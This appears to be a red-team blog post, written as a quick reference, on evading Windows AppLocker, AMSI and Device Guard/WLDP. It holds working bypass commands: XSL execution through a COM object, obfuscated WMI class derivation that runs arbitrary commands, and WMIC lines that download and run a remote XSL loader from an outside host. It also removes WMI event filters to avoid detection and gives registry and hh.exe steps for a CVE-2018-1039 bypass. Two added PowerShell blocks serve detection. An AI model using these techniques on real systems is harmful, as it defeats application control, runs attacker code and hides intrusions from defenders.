Defenses Evasion (The Quick'n Dirty)

This is just a quick and dirty overview of some defense evasion tactics that are out there for some of the common services / processes. I might post something in the future that dives into this deeper - if you don't want to wait for that day to come, I'm sharing with you below some amazing resources and articles I've appreciated in the past.

Awesome tools for restricted env. evasion:
https://github.com/Cn33liz/p0wnedLoader
https://rastamouse.me/2018/05/csharp-dotnettojscript-xsl/
https://github.com/Arno0x/PowerShellScripts
https://github.com/cobbr/PSAmsi/wiki/Introduction-To-PSAmsi
https://github.com/secabstraction/WmiSploit

More:
https://bohops.com/2019/01/10/com-xsl-transformation-bypassing-microsoft-application-control-solutions-cve-2018-8492/
https://tyranidslair.blogspot.com/2018/06/disabling-amsi-in-jscript-with-one.html
https://oddvar.moe/
https://www.fortynorthsecurity.com/building-a-windows-defender-application-control-lab/
https://posts.specterops.io/threat-detection-using-windows-defender-application-control-device-guard-in-audit-mode-602b48cd1c11
https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/evaluate-windows-defender-exploit-guard
http://www.exploit-monday.com/2018/06/device-guard-and-application.html
https://lolbas-project.github.io/#
https://www.contextis.com/en/blog/amsi-bypass

Application Identity Service (Process name: AppIDSvc)

Definition: The Application Identity service determines and verifies the identity of an app. Stopping this service will prevent AppLocker policies from being enforced.

Important: When using Group Policy, you must configure it to start automatically in at least one Group Policy Object (GPO) that applies AppLocker rules. This is because AppLocker uses this service to verify the attributes of a file.
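As an added example (not code from the original post), here is the defender's counterpart to the point above: a PowerShell function that reports whether AppLocker is actually enforcing on a host, combining the AppIDSvc state and start type with the enforcement mode of each rule collection in the effective policy. It assumes Windows PowerShell 5.1 with the built-in AppLocker module; the function name and output fields are mine.

```powershell
# Added example, not code from the original post: report whether AppLocker is
# really enforcing on this host. A stopped AppIDSvc means no enforcement, so the
# service state and the policy's enforcement modes are read together.
# Assumes Windows PowerShell 5.1 and the built-in AppLocker module.
function Get-AppLockerEnforcementState {
    [CmdletBinding()]
    param()

    $svc = Get-Service -Name AppIDSvc -ErrorAction SilentlyContinue
    $status    = if ($svc) { [string]$svc.Status }    else { 'NotFound' }
    $startType = if ($svc) { [string]$svc.StartType } else { 'NotFound' }

    # Effective policy = local policy merged with every GPO that applies AppLocker rules.
    $collections = @()
    $policy = Get-AppLockerPolicy -Effective -ErrorAction SilentlyContinue
    if ($policy) {
        foreach ($rc in $policy.RuleCollections) {
            $collections += [pscustomobject]@{
                Type        = $rc.RuleCollectionType
                Enforcement = [string]$rc.EnforcementMode   # NotConfigured / AuditOnly / Enabled
            }
        }
    }
    $enabled = @($collections | Where-Object { $_.Enforcement -eq 'Enabled' })

    $warnings = @()
    if ($startType -ne 'Automatic') { $warnings += 'AppIDSvc is not set to Automatic start' }
    if ($status -ne 'Running')      { $warnings += 'AppIDSvc is not running: AppLocker rules are not enforced' }
    if ($enabled.Count -eq 0)       { $warnings += 'No rule collection is in Enabled (enforce) mode' }

    [pscustomobject]@{
        ServiceStatus    = $status
        ServiceStartType = $startType
        Collections      = $collections
        # Enforcing only when the service runs AND at least one collection is set to Enabled.
        Enforcing        = ($status -eq 'Running') -and ($enabled.Count -gt 0)
        Warnings         = $warnings
    }
}

Get-AppLockerEnforcementState | Format-List
```

An AuditOnly collection or a stopped service both show up as Enforcing = False, which is the state the bypasses in this post rely on.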
Identification:
Get-Service appidsvc

Bypass through COM object technique:

1) Store payload in XML file:

2) Use "COM" object to execute payload:
$xsl = new-object -ComObject Msxml2.DOMDocument.6.0
$xsl.load("C:\Users\Victim\Documents\minimalist.xml") | out-null
$xsl.setProperty("AllowXsltScript",$true)
$xsl.transformNode($xsl)

Evade Detection and/or Restricted Environments

WMI Class Derivation (Evasion) with no "win32" prefix:
$C = [WmiClass] '/root/cimv2:Win32_Process'
$N = $C.derive('MyEvilProcess')
$N.Put()
Invoke-WmiMethod MyEvilProcess -Name CrEaTe -ArgumentList calc.exe

Advanced WMI Class Derivation - presented at the Security BSides Dublin 2019 talk. Full details: https://github.com/kmkz/PowerShell/tree/master/BsidesDublin-2019

# RandomName function:
function GenerateRandomName(){
    $Pf = "abcdefghijkmnopqrstuvwxyzABCEFGHJKLMNPQRSTUVWXYZ23456789".TOchArarRay()
    $rSVdssS1=""
    1..10 | ForEach { $rSVdssS1 += $Pf | Get-Random }
    return $rSVdssS1
}
# Class derivation
$zNrF = -jOin[regex]::MaTcHeS('sSeCorp_23nIw:2VmIc/tOoR/',".",'RightToLeft')
$CoFtfEgvsJ = [wMicLaSs]$zNrF
$YepTa = "pRoc"+"eSs"
$PoDtbeF4Dp= GenerateRandomName
$N = $CoFtfEgvsJ.dEriVe("$PoDtbeF4Dp")
$N.pUt()
$BlzQ=0
$VrBnZ=111-1+3+7+5+5-3+$BlzQ
$CpOnBt5= gEt-cOntEnt -paTh "\\Vboxsvr\shared\BSIDESIE\cmd.in.txt" # your command
# Payload execution:
iNvokE-wmIMeThOd $PoDtbeF4Dp -NaMe CrEaTe -arGumEntlIst "cMd ^/c $CpOnBt5 >>\\Vboxsvr\shared\BSIDESIE\$rSVdssS.lol" # collect output (if needed)

Authenticated proxy bypass:
"Creates a TCP Tunnel through the default system proxy. As such, it automatically handles proxy authentication if ever required."
https://github.com/Arno0x/PowerShellScripts/blob/master/proxyTunnel.ps1

PowerShell without PowerShell + restricted env. escaping through WMIC XSL payload execution:
C:\Windows\System32\WMIC.exe os get /format:"https://tatamaster.lol/p0wnedLoader/p0wnedLoader.xsl"

Blue team/detection mechanisms evasion for WMI lateral movements:
(Add the following lines to your payload to remove Windows "Applications" Event Viewer logs)
Get-WmiObject __eventFilter -namespace root/subscription -filter "name='_PersistenceEvent_'" | Remove-WmiObject
Get-WmiObject __eventFilter -namespace root/subscription -filter "name='_ProcessCreationEvent_'" | Remove-WmiObject

Antimalware Scan Interface (AMSI)

Identification (for ScanBuffer): In a PowerShell terminal, enter "AmsiScanBuffer" (with double quotes).

Bypasses: https://github.com/kmkz/PowerShell/blob/master/amsi-bypass.ps1

Resources:
https://www.contextis.com/en/blog/amsi-bypass
https://rastamouse.me/2018/12/amsiscanbuffer-bypass-part-4/ (most recent techniques)
https://tyranidslair.blogspot.com/2018/06/disabling-amsi-in-jscript-with-one.html

AppLocker demystification

"When whitelisting policies are enforced, PowerShell CLM is applied in AppLocker (for users in "Allowed Mode") and WDAC (for users and administrators)."
Error message: "This app has been blocked by your system Administrator"

Bypass:
1) Use p0wnedShell via .xsl file + encryption (for Defender bypass), with https://github.com/Cn33liz/p0wnedLoader for payload delivery (WMI). Example:
C:\Windows\System32\wbem\WMIC.exe os get /format:"https://tatamaster/p0wnedLoader.xsl"
2) https://github.com/kmkz/PowerShell/blob/master/Semi-interactive-shell-applocker-bypass.ps1

Resources:
P0wnedShell by Cn33liz: https://github.com/Cn33liz/p0wnedShell
AaronLocker: https://blogs.msdn.microsoft.com/aaron_margosis/2018/06/26/announcing-application-whitelisting-with-aaronlocker/
https://www.slideshare.net/OddvarHlandMoe/appolockalypse-now
https://github.com/api0cradle/UltimateAppLockerByPassList

Windows Lockdown Policy (WLDP aka Device Guard) with User Mode Code Integrity (UMCI) policy

Definition: When "enforced" by AppLocker policy, CLM COM object instantiation is very open. In essence, (m)any COM object can be instantiated by default when WLDP is not active. Under WDAC with UMCI, WLDP greatly reduces this number (between 8 and 50 COM objects according to James Forshaw of Google Project Zero in the .NET COM Instantiation UMCI bypass disclosure write-up linked in the "Resources" part).

Bypass based on CVE-2018-1039 by Google Project Zero:

1) Create a "keys.txt" file with the following content:
HKEY_CURRENT_USER\Software\Classes\CLSID\{70B46225-C474-4852-BB81-48E0D36F9A5A} = REG_SZ WScript.Shell
HKEY_CURRENT_USER\Software\Classes\CLSID\{70B46225-C474-4852-BB81-48E0D36F9A5A}\TreatAs = REG_SZ {72C24DD5-D70A-438B-8A42-98424B88AFB8}
HKEY_CURRENT_USER\Software\Classes\CLSID\{70B46225-C474-4852-BB81-48E0D36F9A5A}\Implemented Categories\{7DD95801-9882-11CF-9FA9-00AA006C42C4}
HKEY_CURRENT_USER\Software\Classes\CLSID\{70B46225-C474-4852-BB81-48E0D36F9A5A}\Implemented Categories\{7DD95802-9882-11CF-9FA9-00AA006C42C4}

2) From the Explorer Run dialog, execute "regini path\to\keys.txt"

3) Create a "shell.html" file with the following content (our payload):
NO OBJECT

4) Execute the HTML file from the Run dialog using "hh.exe path\to\shell.html"

Resources:
https://bugs.chromium.org/p/project-zero/issues/detail?id=1514 (fixed on 5/08/2018)
https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-1039
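As an added example (not code from the original post or from Project Zero), here is the detection side of the keys.txt technique above: a PowerShell hunt that lists CLSID keys carrying a TreatAs redirection and flags the per-user ones that also advertise the Safe for Scripting ({7DD95801-...}) or Safe for Initializing ({7DD95802-...}) categories, which is exactly the shape the bypass registers under HKCU. It assumes Windows PowerShell 5.1; the function name and output fields are mine.

```powershell
# Added example, not code from the original post or from Project Zero: list COM
# classes whose CLSID key carries a TreatAs redirection, with emphasis on HKCU,
# which a standard user can write. The keys.txt above creates exactly this shape:
# a per-user CLSID, a TreatAs pointing at another class, and the
# Safe for Scripting / Safe for Initializing category keys.
# Assumes Windows PowerShell 5.1; function name and output fields are mine.
function Find-ComTreatAsRedirection {
    [CmdletBinding()]
    param(
        [string[]]$Roots = @('HKCU:\Software\Classes\CLSID', 'HKLM:\Software\Classes\CLSID')
    )
    $safeForScripting    = '{7DD95801-9882-11CF-9FA9-00AA006C42C4}'
    $safeForInitializing = '{7DD95802-9882-11CF-9FA9-00AA006C42C4}'

    foreach ($root in $Roots) {
        if (-not (Test-Path -Path $root)) { continue }
        foreach ($clsidKey in Get-ChildItem -Path $root -ErrorAction SilentlyContinue) {
            $treatAs = Get-ItemProperty -Path "$($clsidKey.PSPath)\TreatAs" -Name '(default)' -ErrorAction SilentlyContinue
            if (-not $treatAs) { continue }
            $target = $treatAs.'(default)'

            # Category keys advertise the class as safe to script hosts (the post uses hh.exe).
            $categories = Get-ChildItem -Path "$($clsidKey.PSPath)\Implemented Categories" -ErrorAction SilentlyContinue |
                          ForEach-Object { $_.PSChildName }

            # Resolve the redirection target's display name from the machine-wide registration.
            $targetName = (Get-ItemProperty -Path "HKLM:\Software\Classes\CLSID\$target" -ErrorAction SilentlyContinue).'(default)'

            [pscustomobject]@{
                Hive          = $root.Split(':')[0]
                Clsid         = $clsidKey.PSChildName
                Name          = (Get-ItemProperty -Path $clsidKey.PSPath -ErrorAction SilentlyContinue).'(default)'
                TreatAs       = $target
                TreatAsName   = $targetName
                SafeScripting = [bool]($categories -contains $safeForScripting)
                SafeInit      = [bool]($categories -contains $safeForInitializing)
                UserWritable  = $root -like 'HKCU:*'
            }
        }
    }
}

# HKLM carries legitimate TreatAs entries, so the actionable set is the per-user
# one: TreatAs under HKCU combined with a "safe" category is rare on a clean host.
Find-ComTreatAsRedirection |
    Where-Object { $_.UserWritable -and ($_.SafeScripting -or $_.SafeInit) } |
    Format-Table Clsid, Name, TreatAs, TreatAsName, SafeScripting, SafeInit -AutoSize
```

Run without the Where-Object filter to baseline the HKLM entries first, then alert on any HKCU row that appears afterwards.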